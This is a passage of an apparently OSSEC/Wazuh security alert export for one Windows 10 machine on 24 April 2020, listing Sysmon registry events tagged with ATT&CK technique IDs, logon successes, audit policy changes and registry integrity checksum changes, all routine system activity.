service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.699436700Z"",""eventRecordID"":""904"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.504\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.504"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.504 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 11:01:12.640",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.699230100Z"",""eventRecordID"":""903"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.504\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.504"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.504 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:07.806",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 11:01:06.984",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:06.922",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x2E3F1 + Linked Logon ID: 0x2E3B4 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3d0 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:06.890",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x2E3B4 + Linked Logon ID: 0x2E3F1 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3d0 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:05.995",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 11:01:03.588",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 11:00:32.982",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 11:00:32.964",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 10:59:46.589",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '822cb403c72a645a692b783c441badfe' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'bf360e08c45c4932bb574c7e442b62cc38e9bd46' +", +"Apr 24, 2020 @ 10:59:46.574",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '822cb403c72a645a692b783c441badfe' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'bf360e08c45c4932bb574c7e442b62cc38e9bd46' +", +"Apr 24, 2020 @ 10:59:34.949",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '1c76fe95384571894fea60032499598b' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : 'd5716310782cfc86d0c74a24cb1f7f269a683771' +", +"Apr 24, 2020 @ 10:59:34.933",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : 'ccf3312e10ed522b86fedf9f55f0ee11' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'aecc4f74462e7feab3e10f942d257edbd5ee7e0d' +", +"Apr 24, 2020 @ 10:59:22.308",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '06f3d2f39343f57d32dd262e225aae84' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : 'cc04983290ed793a09187d5412932856395b581c' +", +"Apr 24, 2020 @ 10:58:37.734",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1464110 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.137.137.111:123) is working properly.""" +"Apr 24, 2020 @ 10:58:36.952",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '806bbd1c931a136515484e6569a41608' +New md5sum is : '7ad8870899ca2bf54b124825022fe0c6' +Old sha1sum was: 'b8cf0a58f8b186a12ee578719764e738cd881df5' +New sha1sum is : 'f0e34e29b93cf8d052ac5aea621d98e83c13b488' +", +"Apr 24, 2020 @ 10:58:36.922",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3' +New md5sum is : 'b863e575b2cca664b99a881713f146c2' +Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29' +New sha1sum is : '95491db26e7e8c0fbc75daa3bcebc862313c84ff' +", +"Apr 24, 2020 @ 10:57:51.951",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:00Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:57:48.129",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:57:43.103",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 10:57:17.821",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:26Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:57:14.912",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 10:56:15.156",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 10:56:15.125",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 10:56:08.897",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '1af7f0914012f801bdabc07119bd84db' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +", +"Apr 24, 2020 @ 10:56:07.798",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '1e9409baa8b68f8d5dfa081e75151003' +New md5sum is : '47f9a8fc035cc80b23dfd8be4d23cda6' +Old sha1sum was: '25555a4f57a7b2144caabaf450eb56fe7119a8c0' +New sha1sum is : '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +", +"Apr 24, 2020 @ 10:56:07.782",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '4c17291dcd0de9eb46f1bf8312d3f109' +New md5sum is : '480a7b1436febced63b663e198db057e' +Old sha1sum was: 'a02aa7cd463261dc68ec18a39291b1918d32122d' +New sha1sum is : 'a366c53c7d877bd13ac0386830dbad1b52127af9' +", +"Apr 24, 2020 @ 10:55:57.125",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: '21a66dac78117659043a8212e1fc5a78' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: 'bb97bea171f11b2b6ad914cdf6a4d15847c5eca4' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +", +"Apr 24, 2020 @ 10:55:57.031",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'e9cd6bb35ae467549f2219ff79f022f0' +New md5sum is : 'bbd3c2d027909fd8ca60e5fb29be1c11' +Old sha1sum was: '62e90089ff5bb614d8c46dc0c962555ef30f1362' +New sha1sum is : '840961701b92e0a0bb75a3c992b2e764bb835d51' +", +"Apr 24, 2020 @ 10:55:55.032",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'aca3c8183dee70cfc9f8f83812ae827e' +New md5sum is : '4256845286e0a414097e9c63c150cb5d' +Old sha1sum was: 'f13a6d9ea63bbb6928aba46969a7afa088985abf' +New sha1sum is : '684a425e096a2850d4c8dc9679a024c65fd89a91' +", +"Apr 24, 2020 @ 10:55:54.985",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\Config' checksum changed. +Old md5sum was: '87de3be2e62ab7a015cb40d00caf019c' +New md5sum is : '152ffb3382f568382dfd7c66cbef2454' +Old sha1sum was: '4b47a0aa6a1632c049dc4216dabba9c8ddc01020' +New sha1sum is : 'd2e3bd3fc5942eaf7c0b8ebc889b0f232921b146' +", +"Apr 24, 2020 @ 10:55:54.328",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'c361117616a05d4278b52bebd6da3141' +New md5sum is : '7b25497674cc671619a3e52c5a6b72e8' +Old sha1sum was: 'ec1bd80ed1806a52ea2bf63712d2625626a71bc5' +New sha1sum is : 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +", +"Apr 24, 2020 @ 10:55:54.298",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\SPP' checksum changed. +Old md5sum was: '56bc0c6128b57ea5a28d9f47d40c9e81' +New md5sum is : '405816ce4a643fd7af522b6080aabae6' +Old sha1sum was: '52aac2eaca3d50ad4da73141f58cb0f698cf0358' +New sha1sum is : '47a12735fc5bb600f938079cc3d8f90fca52afb0' +", +"Apr 24, 2020 @ 10:55:52.907",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '544514e57047c2570309981465630650' +New md5sum is : 'acae9dc748745942263a86d7eb614be0' +Old sha1sum was: '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7' +New sha1sum is : '426e630d1ce4b54eb126567e177155a4f7a507fa' +", +"Apr 24, 2020 @ 10:55:52.641",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '6c9fa8f349691cfc6474afbfb85a26d0' +New md5sum is : '73ff3da5b491b534e4f1fca73d797712' +Old sha1sum was: 'cf2a4ead8cc286234f64909716907d8e036d500a' +New sha1sum is : '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +", +"Apr 24, 2020 @ 10:55:52.032",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '8ac497b048ccef73c4ecb361aa3ffac8' +New md5sum is : 'd73c739d94aff99e2de6c480608f2631' +Old sha1sum was: 'a57ddc3084097c99fcffcfb1e624035b13112910' +New sha1sum is : 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +", +"Apr 24, 2020 @ 10:55:51.799",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '963ffd284ab17477c4d656c4f2614c4f' +New md5sum is : '057b39f9a279a74ae6e39c10634a6eab' +Old sha1sum was: 'c0ea9cb87fbded9044c0d4731c687543eb23962a' +New sha1sum is : 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +", +"Apr 24, 2020 @ 10:55:51.047",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '544514e57047c2570309981465630650' +New md5sum is : 'acae9dc748745942263a86d7eb614be0' +Old sha1sum was: '806ec5bc628010b8292a8f9a147a3c4e5f55b8d7' +New sha1sum is : '426e630d1ce4b54eb126567e177155a4f7a507fa' +", +"Apr 24, 2020 @ 10:55:48.688",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'b3b59054b8589793cbece5beceb9b2c2' +New md5sum is : 'ae5aeacd0ec096e337ca3ae6a707a5ef' +Old sha1sum was: '738937cb2816c41b94634becd9c75cffa63c519b' +New sha1sum is : 'cc73062438c2d276ae920c586c61e8046d7af96f' +", +"Apr 24, 2020 @ 10:55:45.172",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: 'b7992042185fc6ec85e366e31893c993' +New md5sum is : '3d3a643354245020081ae89e531e5f43' +Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +New sha1sum is : '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +", +"Apr 24, 2020 @ 10:55:44.235",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SmsRouter\State\Registration\Map' checksum changed. +Old md5sum was: '6f0e8dd0745c85a63da5b9c4048cf7a8' +New md5sum is : 'f725bdba3c624ef1211452f438569838' +Old sha1sum was: 'ff5df2055e8b84f88f69ce4e022f276cddd9ae0c' +New sha1sum is : '76d6ea0f40d643341bc4517a2d1b043f15ea0c6b' +", +"Apr 24, 2020 @ 10:55:42.907",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '635e192cad83fcc0e1b59bc4458960b4' +New md5sum is : '5689c2dd6ed61a04cc389b6099c0aea5' +Old sha1sum was: 'e0e382309ad45d83861d26b3d86c0fab6345eb7b' +New sha1sum is : '64932df77c40a56e97edb3553ce359b3aaff132e' +", +"Apr 24, 2020 @ 10:55:42.844",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: 'dc9f9e3fba782230828c1350ebdd6327' +New md5sum is : '5de0ef21cee3c7b87f2fab30b8b06e2e' +Old sha1sum was: 'df82c4e7b328c25ab2a829fbb36079904d347a00' +New sha1sum is : '95450da791d27d0a0e456663988211c24b30dbec' +", +"Apr 24, 2020 @ 10:55:42.828",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'bd9b4beaac92fe5749542b077fdeffd0' +New md5sum is : 'f93cf0221c7bffcbf0606d9f193a943e' +Old sha1sum was: '770460c89c9b82b0c4bc82f78b714a907c62fe5a' +New sha1sum is : '098e4d9f53900d4e8394afe508e54240c78b74ad' +", +"Apr 24, 2020 @ 10:55:41.737",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:10:50Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:55:38.236",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : 'b94f00fb649e58278413ddb218687776' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +", +"Apr 24, 2020 @ 10:55:31.282",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '50e564d651df4ed3711c530cb99d635a' +New md5sum is : '774e15e7baf44381d722db864ab890d7' +Old sha1sum was: '9f85b67a6c52e8312f838e2577ad0927a069eeda' +New sha1sum is : '469daffaef7546bd68eba730d238e5592de9f468' +", +"Apr 24, 2020 @ 10:55:29.329",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '994c45f15282cc5a92f237967d96fef5' +New md5sum is : '5727fcd23252b0e1550791766fd7e652' +Old sha1sum was: '88530f962585446daf77f46e080d8b08c8e98a2c' +New sha1sum is : '1a0a4badb9ef02d3f518064090d622844165b266' +", +"Apr 24, 2020 @ 10:55:27.563",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '4eb2a07540b08107a0625ee3e4611bbc' +New md5sum is : '71d14a2d2a756124273e36b0738f8bba' +Old sha1sum was: '343b58bbd290264a88f73a3bbfdb8c0877c5bb8e' +New sha1sum is : 'c605e5d23f62dcaf8235115a11a8363912e96ea2' +", +"Apr 24, 2020 @ 10:55:26.610",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'fcd2bde063d08e3e493bd9b171932f62' +New md5sum is : 'b4bce65b22aa4a519547960a719662c4' +Old sha1sum was: '0154114214c1947389b713ef77c27205b797facc' +New sha1sum is : '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6' +", +"Apr 24, 2020 @ 10:55:22.300",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'a836bd80394300540414e863397687ad' +New md5sum is : 'df3256a25e140f891367ef4f45e45db2' +Old sha1sum was: '10c4d918d67affeb805f43db3431644b1b028a63' +New sha1sum is : 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351' +", +"Apr 24, 2020 @ 10:55:20.954",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '735c3ab6e8ca71e23614002bbb028249' +New md5sum is : '5727fcd23252b0e1550791766fd7e652' +Old sha1sum was: 'd5a88f2cb188c5047330cafcb78ced9235190617' +New sha1sum is : '1a0a4badb9ef02d3f518064090d622844165b266' +", +"Apr 24, 2020 @ 10:55:18.313",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '27f0b0536743e3de8fcd99c86a2544f2' +New md5sum is : '1f47b7195d8fed9969326bd01db47d06' +Old sha1sum was: '735e4f181b67d19525042b6d7dd870ffedcd3c0c' +New sha1sum is : 'ee63ae916c97b341f744e3bde4a840cc48ac014b' +", +"Apr 24, 2020 @ 10:55:17.783",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\GoogleChromeElevationService' checksum changed. +Old md5sum was: '7623ffed143b7459169ba5677dbcbf32' +New md5sum is : '8689e28cb67cdeb16cd0f213c561238e' +Old sha1sum was: 